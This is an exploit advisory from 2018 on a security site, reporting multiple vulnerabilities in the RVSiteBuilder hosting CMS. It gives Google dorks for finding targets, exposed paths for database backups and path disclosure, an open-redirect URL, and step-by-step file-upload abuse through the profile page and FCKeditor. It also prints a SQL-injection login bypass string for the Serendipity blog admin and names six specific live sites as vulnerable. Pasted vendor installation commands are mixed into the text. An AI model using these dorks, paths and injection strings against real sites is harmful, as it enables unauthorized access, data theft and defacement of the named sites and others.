RVSiteBuilder RVGlobalSoft CMS High-Performance Hosting Provider Serious Multiple Vulnerabilities

2018.06.11
Risk: Medium
Local: No
Remote: Yes
CVE: N/A

################################################################################################# # Exploit Title : RVSiteBuilder RVGlobalSoft CMS High-Performance Hosting Provider Serious Multiple Vulnerabilities # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Team # Date : 11/06/2018 # Vendor Homepages : rvsitebuilder.com ~ rvglobalsoft.com ~ ckeditor.com ~ + dynarch.com/jscal/ ~ jquery.com ~ docs.s9y.org ~ seagullproject.org ~ seagullsystems.com # Social Media Link : facebook.com/Rvglobalsoft/ ~ facebook.com/RVsitebuilder-331466346876534/ + twitter.com/rvsitebuilder ~ twitter.com/rvglobalsoft_ # Version : All Versions # Google Dork : inurl:''/rvsindex.php/'' # Tested On : Windows and Linux Operating Systems # Category : WebApps # Exploit Risk : Medium and High # CWE : CWE-209 [ Information Exposure Through an Error Message ] + CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] + CWE-264 [ Permissions, Privileges, and Access Controls ] + CWE-200 [ Information Exposure ] + CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ] + CWE-592 [ Authentication Bypass Issues ] + CWE-23 [ Relative Path Traversal ] + CWE-434 [ Unrestricted Upload of File with Dangerous Type ] + CWE-36 [ Absolute Path Traversal ] + CWE-538 [ File and Directory Information Exposure ] + CWE-548 [ Information Exposure Through Directory Listing ] ################################################################################################# # Title : RVSiteBuilder RVGlobalSoft CMS High-Performance Site Builder for WebHosts [ Hosting Provider ] 2018 Serious Multiple Vulnerabilities # Description : RVglobalsoft is the leading software solutions for hosting provider. # Vulnerabilities and Exploits includes => 1) Full Path Disclosure Vulnerability 2) SQL Injection Vulnerability 3) Arbitrary File Upload Vulnerability 4) Arbitrary File Download Database Backup .sql Vulnerability 5) What You See Is What You Get [ WYSIWYG ] FCKeditor Exploiter 6) Blog Administration Control Panel Authentication Bypass Vulnerability 7) Directory Traversal Vulnerability and Information Exposure Through Directory Listing 8) Information Exposure Through an Error Message 9) Permissions, Privileges, and Access Controls # Google Dork 1 : inurl:''/rvsindex.php/'' # Google Dork 2 : inurl:''/rvsindex.php?/user/login'' # Google Dork 3 : inurl:''/rvsindex.php/user/register'' # Google Dork 4 : Index of /js Parent Directory SGL.js SGL/ SglFckconfig.js TreeMenu.js datetimepicker.js ################################################################################################# # RevSiteBuilder Full Path Disclosure Vulnerability and PHP Warnings and Errors [ Critical Vuln for Server Rooting ] => TARGET/blog/rvsindex.php?/sitebuilder/action/list/ Strict Standards: Declaration of RVFlexyStrategy::initEngine() should be compatible with SGL_OutputRendererStrategy::initEngine() in /opt/cpanel/ea-php56/root/usr/share/pear/RVSeagullMod/lib/SGL/RVFlexyStrategy.php on line 89 Strict Standards: Declaration of RVFlexyStrategy::render() should be compatible with SGL_OutputRendererStrategy::render($view) in /opt/cpanel/ea-php56/root/usr/share/pear/RVSeagullMod/lib/SGL/RVFlexyStrategy.php on line 89 Strict Standards: Non-static method SGL_FrontController::isGoToClearCached() should not be called statically in /opt/cpanel/ea-php56/root/usr/share/pear/RVSeagullMod/lib/SGL/FrontController.php on line 257 Strict Standards: Declaration of SGL_MDB2::query() should be compatible with MDB2_Driver_Common::query($query, $types = NULL, $result_class = true, $result_wrap_class = true) in /home/koleksim/.rvsitebuilder/websitepublish/3686a6380b5f3a8986f5ef385ce208f5/var/cachedLibs.php on line 82 Deprecated: Non-static method SGL_Task_SetupPaths::hostnameToFilename() should not be called statically, assuming $this from incompatible context in /opt/cpanel/ea-php56/root/usr/share/pear/RVSeagullMod/lib/SGL/Config.php on line 60 Warning: Include path '/usr/lib/php' not exists in /home/DOMAINADDRESS/public_html/rvscommonfunc.php on line 174 Please contact your host provider ssh as root to server and run. FOR CPANEL => pear install -f /var/cpanel/rvglobalsoft/rvsitebuilder/scripts/RVSeagullMod-1.0.1.tgz perl /usr/local/cpanel/whostmgr/docroot/cgi/rvsitebuilderinstaller/autoinstaller.cgi FOR DİRECTADMİN => pear install -f /usr/local/rvglobalsoft/rvsitebuilder/scripts/RVSeagullMod-1.0.1.tgz perl /usr/local/rvglobalsoft/rvsitebuilderinstaller/autoinstaller.cgi Fatal error: Class 'SGL_FrontController' not found in /home/DOMAINADDRESS/public_html/rvsindex.php on line 20 #################################################################################################### PATH => TARGET/ComponentAndUserFramework.php Please edit /home2/DOMAINADDRESS/public_html/php.ini change include_path to include_path = ".:/usr/php/54/usr/lib64:/usr/php/54/usr/share/pear:/usr/local/lib/php" # PATH for View Homepage => TARGET/rvsindex.php #################################################################################################### # PATH RevSiteBuilder Admin Login Control Panel => TARGET/admin or this is the Admin Panel way => /rvsindex.php?/user/login/ # PATH Admin Panel Login WordPress => TARGET/wp-login.php?redirect_to=http%3A%2F%2FDOMAINADDRESS%2F%2Fwp-admin%2F&reauth=1 # PATH Admin Panel Login Joomla => TARGET/administrator # PATH Admin Panel Login osCommerce => TARGET/admin # PATH Admin Panel Login OpenCart => TARGET/admin Note : Some RVSiteBuilder websites uses wordpress and joomla but all files belongs to revsitebuilder and rvglobalsoft software. It is totally weird vulnerability. They have path like TARGET/blogweb or TARGET/osc But some sites gives this error. Sometimes it asks for username and password. Please contact your provider edit file php.ini change include_path to include_path = ".:/usr/lib/php:/usr/local/lib/php" save file and restart apache #################################################################################################### # PATH for Uploaded Documents => TARGET/documents/ #################################################################################################### # PATH for JS JQuery-Ui Demos and Documents [ View Original Sources ] => TARGET/js/jquery-ui/demos/ and TARGET/js/jquery-ui/docs/ # You can view => Interactions - Widgets ~ Effects ~ About jQuery UI ~ Theming - View Sources #################################################################################################### # PATH for JQuery Tests Version => TARGET/js/jquery-ui/tests/ #################################################################################################### # PATH for Themes Codes => TARGET/js/jquery-ui/themes/base/ and TARGET/js/themes/ #################################################################################################### # PATH jscalendar-1.0 "It is happening again" => TARGET/js/jscalendar/ => The Coolest DHTML Calendar - Online Demo #################################################################################################### # PATH Changelog Last Changes => TARGET/js/scriptaculous/CHANGELOG #################################################################################################### # PATH Learn Version => TARGET/js/scriptaculous/VERSION #################################################################################################### # PATH for Optimizer => TARGET/optimizer.php Please edit /home2/DOMAIN/public_html/php.ini change include_path to include_path = ".:/usr/php/54/usr/lib64:/usr/php/54/usr/share/pear:/usr/local/lib/php" #################################################################################################### # Other Paths that gives same error => #TARGET/rvsMasterCompoDB.php #TARGET/rvsStaticWeb.php #TARGET/rvscommonfunc.php #TARGET/rvssetup.php Please edit /home2/DOMAIN/public_html/php.ini change include_path to include_path = ".:/usr/php/54/usr/lib64:/usr/php/54/usr/share/pear:/usr/local/lib/php" #################################################################################################### #QuickForm tutorial example - *Enter your name: #/scripts/rvslib/Pear/quickFormTest.php #/themes/default/default/testForms.html #################################################################################################### #{if:adminApprove} {adminApprove} #/themes/rvtheme/authweb/authPage.html #################################################################################################### #{foreach:aFaqData,key,aValue} {if:aValue.category_name} #/themes/rvtheme/faqweb/viewFaqWeb.html ################################################################################################### #{if:forumsInstall} - Search for forums #TARGET/themes/rvtheme/forums/blocksearch.html #################################################################################################### # Testing forms # /themes/default/testForms.php ################################################################################################# # RevSiteBuilder RVGlobalSoft Open Redirection Vulnerability # TARGET/login => It automatically redirects to this URL Link here => /rvsindex.php?/user/login/action/login # Open Redirection Page /rvsindex.php?/user/login/redir/ANY-DOMAIN-ADRESS ################################################################################################# # {translate(pageTitle)} Contactus # /themes/rvtheme/main/contactMail.html ################################################################################################# #{translate(#Please enter your name and e-mail address and select the newsletters that you want to subscribe.#)} #/themes/rvtheme/newsletter/authorize.html #/themes/rvtheme/newsletter/list.html #/themes/rvtheme/newsletter/uikit_list.html ################################################################################################# #RVTheme Admin Area and Users useable Login Paths => #/themes/rvtheme/user/account.html #/themes/rvtheme/user/accountSummary.html #/themes/rvtheme/user/blockLogin.html #/themes/rvtheme/user/blockLogout.html #/themes/rvtheme/user/horizontalBlockLogin.html #/themes/rvtheme/user/loginForgot.html #/themes/rvtheme/user/prefUserEdit.html #/themes/rvtheme/user/profile.html #/themes/rvtheme/user/uikit_login.html #/themes/rvtheme/user/uikit_loginForgot.html #/themes/rvtheme/user/uikit_prefUserEdit.html #/themes/rvtheme/user/uikit_userAddUseCompoDB.html #/themes/rvtheme/user/uikit_userPasswordEdit.html #/themes/rvtheme/user/userAdd.html #/themes/rvtheme/user/userAddUseCompoDB.html #/themes/rvtheme/user/userPasswordEdit.html #/themes/rvtheme/user/verticalBlockLogin.html #/themes/rvtheme_admin/articleweb/admin_articleEdit.html #/themes/rvtheme_admin/articleweb/admin_articleManager.html #/themes/rvtheme_admin/articleweb/admin_articleTypeEdit.html #/themes/rvtheme_admin/articleweb/admin_articleTypeManager.html #/themes/rvtheme_admin/faqweb/admin_faqCategoryEdit.html #/themes/rvtheme_admin/faqweb/admin_faqWebEdit.html #/themes/rvtheme_admin/faqweb/admin_faqWebManager.html #/themes/rvtheme_admin/css/ ##################################################################################################### #Learn Version of the RVSiteBuilder and RVGlobalSoft => TARGET/version.txt ##################################################################################################### #Flash Player Version Detection => TARGET/Scripts/AC_RunActiveContent.js ##################################################################################################### Getting started with Seagull Project => [ Seagull PHP Framework - © Seagull Systems 2003-2007 ] /rvsindex.php?/default/masterLayout/layout-navtop-3col.css/ ##################################################################################################### # RevSiteBuilder SQL Injection Vulnerability => #Strict Standards: Declaration of RVFlexyStrategy::initEngine() should be compatible with SGL_OutputRendererStrategy::initEngine() in /usr/local/lib/php/RVSeagullMod/lib/SGL/RVFlexyStrategy.php on line 89 #Strict Standards: Declaration of RVFlexyStrategy::render() should be compatible with SGL_OutputRendererStrategy::render($view) in /usr/local/lib/php/RVSeagullMod/lib/SGL/RVFlexyStrategy.php on line 89 #Warning: include(SGL_PATH/lib/SGL/FrontController.php): failed to open stream: No such file or directory in /home/DOMAINADDRESS/public_html/wysiwyg/fckeditor/editor/filemanager/connectors/php/config.php on line 264 ################################################################################################# # What You See Is What You Get [ WYSIWYG ] Exploiter => # WYSIWYG FCKeditor Arbitrary File Upload Vulnerability and Exploit # Exploit => ..../wysiwyg/fckeditor/editor/filemanager/connectors/uploadtest.html # Example Site => /images/.... # Allowed File Extensions => .txt .png .gif .jpg .xml # Sometimes Wysiwyg Editor Gives this error when trying upload a file to the server Please contact your host provider ssh as root to server and run. For cpanel pear install -f /var/cpanel/rvglobalsoft/rvsitebuilder/scripts/RVSeagullMod-1.0.1.tgz perl /usr/local/cpanel/whostmgr/docroot/cgi/rvsitebuilderinstaller/autoinstaller.cgi For directadmin pear install -f /usr/local/rvglobalsoft/rvsitebuilder/scripts/RVSeagullMod-1.0.1.tgz perl /usr/local/rvglobalsoft/rvsitebuilderinstaller/autoinstaller.cgi Tutorial '' How to download RVsiteBuilder package file manually ? '' For cPanel -------------------- SSH to your cPanel server as root and run command cd /usr/local/cpanel/whostmgr/docroot/cgi/ rm -rf /usr/local/cpanel/whostmgr/docroot/cgi/rvsitebuilderinstaller/ rm -f rvsitebuilderinstaller.tar wget http://download.rvglobalsoft.com/rvsitebuilderinstaller.tar tar -xvf rvsitebuilderinstaller.tar rm -f rvsitebuilderinstaller.tar mkdir /usr/local/cpanel/whostmgr/docroot/cgi/rvsitebuilderinstaller/packages cd /usr/local/cpanel/whostmgr/docroot/cgi/rvsitebuilderinstaller/packages wget http://download.rvglobalsoft.com/download.php/rvsdownload/scriptdownloadpackage.tar tar -xvf scriptdownloadpackage.tar /usr/local/cpanel/3rdparty/bin/php scriptdownloadpackage.php Once complete download file manually, please follow the instruction in this link. https://www.rvsitebuilder.com/installation/ -------------------- For DirectAdmin -------------------- SSH to your cPanel server as root and run command cd /usr/local/rvglobalsoft/rvsitebuilderinstaller/packages wget http://download.rvglobalsoft.com/download.php/rvsdownload/scriptdownloadpackage.tar tar -xvf scriptdownloadpackage.tar php scriptdownloadpackage.php Once complete download file manually, please follow the instruction in this link. https://www.rvsitebuilder.com/installation/ Reference => rvglobalsoft.com/knowledgebase/article/148/how-to-download-rvsitebuilder-package-file-manually/ Reference => rvskin.com/rvlogin/rvloginssh ################################################################################################## # RevSiteBuilder Arbitrary File Database DB Backup .sql Download Vulnerability # TARGET/rvsDbBackup.sql => OR download and view SQL Database Backup Files => TARGET/rvsUtf8Backup/rvsDbBackup.sql # View RevSiteBuilder Page Data Backup => TARGET/rvsUtf8Backup/rvsPageData.sql # Example Site DB Backup View => archive.is/Demkr ################################################################################################### 1) Register yourself to the site TARGET/rvsindex.php?/user/register/ It says => You have successfully been registered. Please check your email for confirmation of your password. Note : Confirm your registration in order to proceed. Sometimes RVSiteBuilder and RVGlobalsoft gives you a new password or you choose your password while registration. Pay attention : When you register choose your nickname carefully because it is important. It says => Activation is successfully. Please login. 2) Login to the User Interface => TARGET/rvsindex.php?/user/login/action/login 3) You can use Account - User Preference - User Password Change Area /rvsindex.php?/user/account/action/viewProfile/ /rvsindex.php?/user/account/ /rvsindex.php?/user/userpreference/ /rvsindex.php?/user/userpassword/action/edit/ 4) Go to your Profile like this => TARGET/rvsindex.php?/user/account/action/viewProfile/ Edit these Values Choose Image Upload => Allowed File Extensions ( jpg,gif,bmp,png,txt,html) It says => Your profile details have been successfully updated PATH : /themes/rvtheme/images/YOURNİCKNAME. Note : Your chosen nickname is important while registration. Upload your html or txt file but do not put like this .yournickname.html Just . [ dot ] is important here. You will see your index on that site. ################################################################################################# # Serendipity RevSiteBuilder Blog Administration # /blogweb/serendipity_admin.php # Username : '=''or' # Password : '=''or' # You can use for both of them as '' admin '' '' admin '' # /serendipity/serendipity_admin.php?serendipity[adminModule]=media&serendipity[adminAction]=addSelect # /blogweb/serendipity_admin_image_selector.php?serendipity[htmltarget]=img_icon&serendipity[filename_only]=true # /blogweb/serendipity_admin.php?serendipity[adminModule]=media&serendipity[adminAction]=addSelect # /blogweb/serendipity_admin.php?serendipity[adminModule]=personal # /blogweb/uploads/yourfilename.rar # Solution for Serendipity Blog Administration # To mitigate this issue please upgrade at least to version 2.0.2: # Download Link : https://github.com/s9y/Serendipity/releases/download/2.0.2/serendipity-2.0.2.zip # Please note that a newer version might already be available. ################################################################################################# How to Install RVsitebuilder for Hosting Provider [ Bugs Fixation ] Check every folder and limit with .htaccess cPanel ssh to your server as root and install plugin 'RVglobalsoft manager' by run following shell command: cd /usr/src; rm -fv rvsitebuilderinstall.sh; wget http://download.rvglobalsoft.com/rvsitebuilderinstall.sh; chmod +x rvsitebuilderinstall.sh; ./rvsitebuilderinstall.sh Login to WHM as root. Go to WHM > Plugins > and run RVglobalsoft manager then follow simple install process. Configure plugin for your panel. It's all done! RVsitebuilder is ready to use for all your users. DirectAdmin ssh to your server as "root" and install plugin 'RVglobalsoft manager' by run following shell command: cd /usr/src; rm -fv rvsitebuilderdainstall.sh; wget http://download.rvglobalsoft.com/rvsitebuilderdainstall.sh; chmod +x rvsitebuilderdainstall.sh; ./rvsitebuilderdainstall.sh For DirectAdmin panel with PHP version 5.5 only (If your panel is lower version of PHP, skip to step 3) 2.1 Run the following command to make RVsitebuilder compatible with PHP 5.5: perl /usr/local/directadmin/plugins/rvsitebuilderinstaller/admin/installphpda.pl 2.2 Run the following command to make RVseagullmod compatible with PHP 5.5: perl /usr/local/rvglobalsoft/rvsitebuilderinstaller/autoinstaller.cgi --force=rvseagullmod Open file 'directadmin.conf' that located in: usr/local/directadmin/conf/directadmin.conf and change the value of 'numservers' from 5 to 15 Go to Directadmin > Admin level > and run 'RVsitebuilder Admin' then follow simple install process. Login to DirectAdmin as "admin" and Configure plugin on your panel. RVsitebuilder in DirectAdmin plugins cannot configure hosting plans but you can set plans in user level by RVsitebuilder Admin Go to Directadmin > Admin level > open RVsitebuilder Admin and configure in 'User Control List' or 'Reseller Control List.' ################################################################################################# RVSiteBuilder Last Changes and Bugs Fixation Reports [ Changelog ] => rvsitebuilder.com/changelog/ RVSiteBuilder Installation => rvsitebuilder.com/installation/ RVSiteBuilder and RVGlobalSoft Tutorials => rvsitebuilder.com/tutorials/ ~ rvglobalsoft.com/installation/ ~ documentation.cpanel.net/display/68Docs/Installation+Guide ################################################################################################## # Example Vulnerable Sites => 1) bevstop.com 2) ecologichouse.ro 3) delta-izoterm.com 4) smoke911ga.com 5) hoofin-about.co.uk 6) rkdzns.com ################################################################################################# # Discovered By Hacker KingSkrupellos from Cyberizm.Org Digital Security Team 2012 - 2018 #################################################################################################


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top